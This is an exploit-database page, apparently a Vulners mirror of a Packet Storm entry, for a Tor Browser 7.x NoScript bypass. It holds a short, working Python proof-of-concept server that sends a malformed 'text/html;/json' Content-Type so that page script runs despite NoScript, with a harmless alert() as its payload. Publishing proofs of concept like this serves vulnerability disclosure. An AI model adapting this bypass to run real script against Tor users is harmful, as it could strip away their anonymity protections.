Lucene search
+L

Tor Browser 7.x NoScript Bypass

🗓️ 11 Sep 2018 00:00:00Reported by x0rzType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 23 Views

Tor Browser 7.x NoScript Bypass HTTP Server Exploi

Code
`#!/usr/bin/python  
from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer  
  
PORT_NUMBER = 31337  
  
class myHandler(BaseHTTPRequestHandler):  
  
#Handler for the GET requests  
def do_GET(self):  
self.send_response(200)  
self.send_header('Content-type','text/html;/json') # Here is where the magic happens  
self.end_headers()  
self.wfile.write("<html>Tor Browser 7.x PoC<script>alert('NoScript bypass')</script></html>")  
return  
  
try:  
server = HTTPServer(('', PORT_NUMBER), myHandler)  
print 'Started httpserver on port ' , PORT_NUMBER  
server.serve_forever()  
  
except KeyboardInterrupt:  
print '^C received, shutting down the web server'  
server.socket.close()  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

11 Sep 2018 00:00Current
7.4High risk
Vulners AI Score7.4
23